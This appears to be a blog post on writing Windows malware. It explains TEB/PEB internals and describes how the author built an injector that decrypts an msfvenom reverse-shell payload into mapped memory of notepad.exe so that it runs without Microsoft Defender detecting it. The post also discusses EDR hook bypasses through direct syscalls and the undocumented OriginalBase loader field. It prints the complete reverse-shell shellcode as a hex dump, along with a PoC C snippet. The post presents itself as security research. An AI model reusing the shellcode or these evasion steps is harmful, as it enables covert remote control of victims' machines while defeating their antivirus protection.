AV/EDRs #
Now that the theoretical foundation of Microsoft architecture is laid out, how do PE files work dynamically and how can we abuse them? It is worth noting that depending on the threat protection software such as antivirus (AV) or Endpoint Detection and Response (EDR) used, the malware might detected and removed. Threat protection software mainly uses two different detection mechanisms: static and dynamic analysis. Static analysis usually encompasses things like the hash of the file and what it’s importing. Dynamic analysis is monitoring the binary at runtime to determine if the actions it takes are malicious or not. For example, Wannacry is a highly signatured malware specimen in which the hash is known to be malicious. However if a single line is changed, it will change the hash, and by extension, not be as detectable. This is when dynamic detection comes into play. If some malware is trying to inject into a process and execute the newly injected code, that can be seen as malicious activity since no process should be injecting code into another process and executing that code. By changing the behavior of the injection process, it can alter how it is detected at runtime. A critical piece in all of this is how AV/EDR engines detect these things and, by extension, how we might avoid detection.
TEB & PEB #
When the binaries are copied into memory, they are assigned a Thread Environment Block (TEB) and a Process Environment Block (PEB). Both hold information about the specific thread/process such as what modules (DLLs) are loaded, where they are in memory, if the process is being debugged, and much more. The TEB is the initial access vector to all of these. Embedded in the TEB is a pointer to the PEB. There are a few API calls that can be made to access the TEB, but under the hood, they all do the same thing.
To access the TEB at the low level, the gs
register (x64 bit) will essentially hold a pointer to the base address for the TEB. Thus, a call out to gs:[0x00]
in assembly will drop you into the start of the struct.
winternl.h
header file. However most of it is undocumented (this is why most of the members are reserved). For the purposes of this article, the official header file definition will do just fine, and appears below:
typedef struct _TEB {
PVOID Reserved1[12];
PPEB ProcessEnvironmentBlock;
PVOID Reserved2[399];
BYTE Reserved3[1952];
PVOID TlsSlots[64];
BYTE Reserved4[8];
PVOID Reserved5[26];
PVOID ReservedForOle; // Windows 2000 only
PVOID Reserved6[4];
PVOID TlsExpansionSlots;
} TEB, *PTEB;
Notice the second member which is the pointer to the PEB. This member is always at an offset of 0x60
in hex, or 96 bytes. Although this is a kernel level struct, like the NTAPI, therefore the offset can change through updates. That being said, grabbing the PEBs base address can be done in several ways. The way this happens under the hood for all of them (that I am aware of) is a call to gs:[0x60]
in assembly. The call goes into the TEB and adds the offset of 0x60
which belongs to the member holding the pointer to the PEB.
Development #
So how did I create my malware and what was my methodology? I started by thinking about what I wanted it to do. Because I have not done this before, I decided to start simple and create a basic TCP reverse shell injector. Although this could be easily done with a Powershell one-liner, I wanted this to be malleable so that any shellcode could be swapped in and it would still work. I also wanted a challenge to bypass WIndows Defender by using a highly signatured payload. The payload I decided to start with was an msfvenom stageless TCP reverse shell. I don’t have access to test against enterprise or higher-end EDRs, so please note that the development and objectives here reflect that of bypassing Microsoft Defender.
As mentioned previously, AV/EDR engines work distinctly in static and dynamic analysis. The easiest way I have found to bypass with is static analysis using techniques such as encryption. I opted to encrypt my shellcode within a byte array variable. This means that the encrypted shellcode would be held in the .text
section of the PE file. Encryption will usually increase the entropy of the file, thus making it more suspicious to the engines. However, Defender doesn’t do a deep analysis (that I am aware of) so I wasn’t concerned in that regard.
The logic of the malware itself is fairly straight forward. The idea is that once it’s executed, it will inject the shellcode into the target process, decrypt, and run the payload which will callback to a remote listener. The first thing it does is hunt for the victim process which will become the “proxy” within which the payload will be injected. This is done for several reasons, but mainly it’s because if the EDR catches the shellcode, it won’t burn the injector, signature it, and alert on it. Instead it will alert on the target process having malicious shellcode in it and kill that. In an enterprise environment, the target process should also be one that usually performs actions that are aligned with those in which you are taking. For example, if I am injecting a reverse shell into notepad.exe
, this should throw alarm bells off since notepad isn’t normally reaching out to other systems. In fact it’s only there to create local notes on disk. A less suspicious and quiet way is to inject into explorer.exe
because that usually is connected to file shares and reaching out to other systems in the network. Even better, what if firefox.exe
is running? That also would work as it always is reaching out to the internet. In the wild, it would be best to manually search the processes currently running in the system and see which ones fit your use case. For my proof of concept, I elected to use notepad.exe
as the target process as that is a good way to control the behavior of my malware along with debugging and showing the capabilities. It also will be more suspicious and thus is a good way to showcase this process (given that is for educational purposes).
Once it finds the target process, it will create a mapping of memory between itself and the target. Effectively this means that any changes in the specified memory region will be replicated across both processes. Think of it as when a symlink is used between directories in the file system but instead of it being directories on the disk, it is a region within memory. This is done because injecting memory into a process is highly monitored and signatured. For example, using the VirtualAllocEx
WinAPI function (which creates a memory region within a target process) will get caught most of the time when using it to inject a malicious payload because it has been used for malicious purposes too many times. For this reason, even with encryption, for every change in the memory region, Defender will potentially scan it. As mentioned above, processes should seldom be injecting into other processes and executing that injected code. I found that a way around this scrutiny is to map the two processes together to create virtually a single address space within which I can work. I do this first before decrypting the shellcode because when the allocation of the new memory region takes place, it also zeros it out. Therefore, when the memory is scanned, it will look benign with only zeros and nothing else within it.
Now that the location of the shellcode is allocated and mapped, I am able to decrypt the shellcode. Windows Defender (and other EDRs) usually scan the memory when changes occur. This is why I zero out the new region when the initial allocation is done. This is especially prevalent when injecting new data from one process’s memory to another because it isn’t local to the current process. However, because of the mapped region, I can decrypt and copy the shellcode locally within the mapped memory without having to touch the target process. It is fairly normal for a process to manipulate its own memory so Defender usually won’t scrutinize it closely. Once copied, the target process will contain the malicious shellcode injected into it and all that is left is to execute it.
The execution uses a simple call to create a new thread on the target process, but instead of starting the thread with the intended starting address, I can specify it to start with the base address of the mapped memory holding the shellcode. This will start the execution of the injected malicious shellcode and, therefore, gain a callback to my listener for the reverse shell.
To make sure it wasn’t a one off (or something strange happened), I executed it multiple times and still got the same result. I also created an executable version of the payload through msfvenom
and as soon as it touched the disk, it got caught. The results of these tests suggest that this method is valid, and my stager successfully bypassed Windows Defender!
Here is a quick proof of concept demo to show the malware in action:
The Windows box is fully up to date, and as you can see there are no threats detected. This result means that Defender did not alert or pick up on any malicious activity even though the shellcode was executed and got a successful callback to the remote listener. Let’s go a bit more in depth for the memory analysis to observe the shellcode in the live memory dump:
Notice the first few bytes of the payload. This is important because the byte array of fc 48 83 e4
is a well known signature of msfvenom payloads; they usually start this way or some similar form. In other words, this signifies the successful injection and detection bypass of Defender with a known malicious signature. Following that, you can see the rest of the payload in the mapped memory region. This matches up to what the original shellcode was that was generated before being encrypted and loaded into the malware:
┌──(kali㉿kali)-[~]
└─$ xxd byte.bin
00000000: fc48 83e4 f0e8 c000 0000 4151 4150 5251 .H........AQAPRQ
00000010: 5648 31d2 6548 8b52 6048 8b52 1848 8b52 VH1.eH.R`H.R.H.R
00000020: 2048 8b72 5048 0fb7 4a4a 4d31 c948 31c0 H.rPH..JJM1.H1.
00000030: ac3c 617c 022c 2041 c1c9 0d41 01c1 e2ed .<a|., A...A....
00000040: 5241 5148 8b52 208b 423c 4801 d08b 8088 RAQH.R .B<H.....
00000050: 0000 0048 85c0 7467 4801 d050 8b48 1844 ...H..tgH..P.H.D
00000060: 8b40 2049 01d0 e356 48ff c941 8b34 8848 .@ I...VH..A.4.H
00000070: 01d6 4d31 c948 31c0 ac41 c1c9 0d41 01c1 ..M1.H1..A...A..
00000080: 38e0 75f1 4c03 4c24 0845 39d1 75d8 5844 8.u.L.L$.E9.u.XD
00000090: 8b40 2449 01d0 6641 8b0c 4844 8b40 1c49 .@$I..fA..HD.@.I
000000a0: 01d0 418b 0488 4801 d041 5841 585e 595a ..A...H..AXAX^YZ
000000b0: 4158 4159 415a 4883 ec20 4152 ffe0 5841 AXAYAZH.. AR..XA
000000c0: 595a 488b 12e9 57ff ffff 5d49 be77 7332 YZH...W...]I.ws2
000000d0: 5f33 3200 0041 5649 89e6 4881 eca0 0100 _32..AVI..H.....
000000e0: 0049 89e5 49bc 0200 115c c0a8 7c80 4154 .I..I....\..|.AT
000000f0: 4989 e44c 89f1 41ba 4c77 2607 ffd5 4c89 I..L..A.Lw&...L.
00000100: ea68 0101 0000 5941 ba29 806b 00ff d550 .h....YA.).k...P
00000110: 504d 31c9 4d31 c048 ffc0 4889 c248 ffc0 PM1.M1.H..H..H..
00000120: 4889 c141 baea 0fdf e0ff d548 89c7 6a10 H..A.......H..j.
00000130: 4158 4c89 e248 89f9 41ba 99a5 7461 ffd5 AXL..H..A...ta..
00000140: 4881 c440 0200 0049 b863 6d64 0000 0000 H..@...I.cmd....
00000150: 0041 5041 5048 89e2 5757 574d 31c0 6a0d .APAPH..WWWM1.j.
00000160: 5941 50e2 fc66 c744 2454 0101 488d 4424 YAP..f.D$T..H.D$
00000170: 18c6 0068 4889 e656 5041 5041 5041 5049 ...hH..VPAPAPAPI
00000180: ffc0 4150 49ff c84d 89c1 4c89 c141 ba79 ..API..M..L..A.y
00000190: cc3f 86ff d548 31d2 48ff ca8b 0e41 ba08 .?...H1.H....A..
000001a0: 871d 60ff d5bb f0b5 a256 41ba a695 bd9d ..`......VA.....
000001b0: ffd5 4883 c428 3c06 7c0a 80fb e075 05bb ..H..(<.|....u..
000001c0: 4713 726f 6a00 5941 89da ffd5 G.roj.YA....
EDR Evasion #
With the knowledge presented thus far, there are a few theoretical ways to improve this malware to bypass high end and enterprise EDRs. Although I don’t go into every possible way this could be achieved, the following are a couple that I have researched and learned over the course of this project.
Some EDRs work by hooking into a plethora of DLLs commonly used and proxying the calls to their functions through the EDRs engine. This in turn performs correlation analysis to determine if there is any malicious activity. Both of these techniques use functionalities to call the original DLLs functions, thereby, bypassing the hooked function.
The the first technique builds from how the WinAPI works as described in the previous article. Calling the API natively will get caught through the EDR. Instead calling the NTAPI version from ntdll.dll
could potentially alleviate some detection (although most EDRs now hook into ntdll.dll
anyway). Directly calling the syscall would be even better because the call is going through the kernel itself without needing any DLLs to assist, thus bypassing the hooked functions.
A second way to bypass the hook is through the PEB. Specifically there are a few members within the PEB that provide information useful to call the original function. Grabbing a specific member will give a pointer to the base address to the function without the hook in place. To do this there are a few extra things to know such as how to grab the TEB in the first place.
struct _TEB
{
struct _NT_TIB NtTib; //0x0
VOID* EnvironmentPointer; //0x38
struct _CLIENT_ID ClientId; //0x40
VOID* ActiveRpcHandle; //0x50
VOID* ThreadLocalStoragePointer; //0x58
struct _PEB* ProcessEnvironmentBlock; //0x60
ULONG LastErrorValue; //0x68
ULONG CountOfOwnedCriticalSections; //0x6c
VOID* CsrClientThread; //0x70
VOID* Win32ThreadInfo; //0x78
ULONG User32Reserved[26]; //0x80
ULONG UserReserved[5]; //0xe8
VOID* WOW32Reserved; //0x100
ULONG CurrentLocale; //0x108
ULONG FpSoftwareStatusRegister; //0x10c
VOID* ReservedForDebuggerInstrumentation[16]; //0x110
VOID* SystemReserved1[25]; //0x190
VOID* HeapFlsData; //0x258
ULONGLONG RngState[4]; //0x260
CHAR PlaceholderCompatibilityMode; //0x280
UCHAR PlaceholderHydrationAlwaysExplicit; //0x281
CHAR PlaceholderReserved[10]; //0x282
ULONG ProxiedProcessId; //0x28c
............
};
If you want to get the base address of the TEB, you have to do it in a roundabout way. Specifically, the first member of the TEB is a Thread Information Block (TIB) struct. This struct contains information about the current thread as shown below:
struct _NT_TIB64
{
ULONGLONG ExceptionList; //0x0
ULONGLONG StackBase; //0x8
ULONGLONG StackLimit; //0x10
ULONGLONG SubSystemTib; //0x18
union
{
ULONGLONG FiberData; //0x20
ULONG Version; //0x20
};
ULONGLONG ArbitraryUserPointer; //0x28
ULONGLONG Self; //0x30
};
The Self
member holds a pointer to the base address of the TEB itself. This means that within the first member of the TEB and last member within that, we can grab the base address of the TEB struct. The offset from the beginning of the TEB to the last member of the TIB is 0x30
. Referencing gs:[0x30]
in assembly will grab the base address in which the TEB is located. A simple call to __readgsqword(0x30)
in C will do just that and get the base address to the TEB. However to get the PEB because it’s at an offset of 0x60
, means adjusting the call to __readgsqword(0x60)
.
ldr
, and is of the type PEB_LDR_DATA
. The ldr
or “loader” is a struct that holds information pertinent to the DLLs required for the process. These structs can be found below:
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID Reserved4[3];
PVOID AtlThunkSListPtr;
PVOID Reserved5;
ULONG Reserved6;
PVOID Reserved7;
ULONG Reserved8;
ULONG AtlThunkSListPtr32;
PVOID Reserved9[45];
BYTE Reserved10[96];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved11[128];
PVOID Reserved12[1];
ULONG SessionId;
} PEB, *PPEB;
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
Within the ldr
there is a doubly linked list called InMemoryOrderModuleList
. This is of the type LIST_ENTRY
. Because it is a doubly linked list the native construction for it contains only two members: Flink
and Blink
. The former is a pointer to the next entry within the list, while the latter is a pointer to the previous entry. My assumption is they mean “forwards link” and “backwards link” respectively.
LIST_ENTRY
structure definition is held in the ntdef.h
header file. This is the “template” for any doubly linked lists in Windows. However, the only capabilities it has are to go either forwards or backwards in the list. There is no information that can be stored so modifying the list is needed. This can be done by creating a new struct with the name being NameOfStruct_ENTRY
. This will allow the modification to insert information in the list. Microsoft has done this for InMemoryOrderModuleList
and made the name _LDR_DATA_TABLE_ENTRY
. The structs can be seen below:
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;
typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks;
PVOID Reserved2[2];
PVOID DllBase;
PVOID Reserved3[2];
UNICODE_STRING FullDllName;
BYTE Reserved4[8];
PVOID Reserved5[3];
#pragma warning(push)
#pragma warning(disable: 4201) // we'll always use the Microsoft compiler
union {
ULONG CheckSum;
PVOID Reserved6;
} DUMMYUNIONNAME;
#pragma warning(pop)
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
The InMemoryOrderModuleList
member is a doubly linked list of LIST_ENTRY
structures which point to LDR_DATA_TABLE_ENTRY
structs. These hold the information related to a specified DLL required for the process. For each required DLL, there is an LDR_DATA_TABLE_ENTRY
structure for it. The two members to note are the DllBase
and FullDLLName
. The former points to where the DLL for the process is located in memory and the latter is the name of the DLL. In order to get the base address of a specific DLL in this way, we would have to loop through the list and compare the name of the one we want to the name member. Once one is found, grab the DllBase
member which would point to the base address.
However how some EDRs work (specifically SentinelOne (S1)) as of the date of this article), is that they modify the DllBase
member of the DLLs they are monitoring and change it to their own. This is important because most hooks don’t take place this deep within the process. There is an undocumented member of the LDR_DATA_TABLE_ENTRY
struct which can bypass the hooked member and get the clean base address for the specified DLL. This member is called OrgininalBase
and is at an offset of 0xf8
.
For example walking through the debugger with WinDbg
, I can start with finding the PEB and, by extension, the Ldr
:
Clicking into the Ldr
shows the member I mentioned before which is InMemoryOrderModuleList
:
Once more, clicking into the list will show the LIST_ENTRY
struct which gives the Flink
and Blink
members. The addresses to the right of them are their pointers to the LDR_DATA_TABLE_ENTRY
structs:
The first entry in the linked list is always describing the process. In this case that would be notepad.exe
for the name of the module. To show that, take the address the Flink
is pointing to and look at the LDR_DATA_TABLE_ENTRY
for it:
As seen in the FullDllName
member, the first link in the list is notepad.exe
which corresponds to the current process the PEB is describing. In order to get the DLLs, click the Flink
again and it will move by one position in the list. The pointer will now point to the first DLL loaded within the process which usually is ntdll.dll
:
Notice how the address changed. Take the address and show the LDR_DATA_TABLE_ENTRY
for that:
The FullDllName
is now ntdll.dll
which means we are in the entry for ntdll
. As I mentioned, looking at the members, the DllBase
shows the current base address for the DLL. At the bottom at offset 0x0f8
, the OriginalBase
member appears as well. The values seem different at first but that is because DllBase
is a pointer and OriginalBase
is a static value.
Given that I don’t have S1 to test, I was poking around with how this member works and it gave me the same address of the DllBase
member. I don’t have any way to prove or disprove this theory but testing shows, it could work. One thing to note is because it is undocumented, I had to call it by its offset instead of the member directly.
The PoC code snippet I used to calculate it is shown below for the OriginalBase
, although the same code was conducted for the DllBase
. Instead of 0xf8
offset, it is 0x30
which corresponds to DllBase
:
LDR_DATA_TABLE_ENTRY* mod = (LDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(pDataTableEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
size_t offset = 0xf8;
UINT8* pBase = (UINT8*)mod;
UINT8* calc = pBase + offset;
HMODULE finalAddy = *(HMODULE*)calc;
return finalAddy;
The output of the addresses is as follows:
DllBase: 0x00007FF959AF0000
OriginalBase: 0x00007FF959AF0000
The fact they are the same means they are both pointing to a good, clean version of the DLL but from what I understand, the OriginalBase
will always point to the “original” one whereas the DllBase
can be manipulated by EDRs like S1. If I am wrong or there is a flaw in my research please let me know!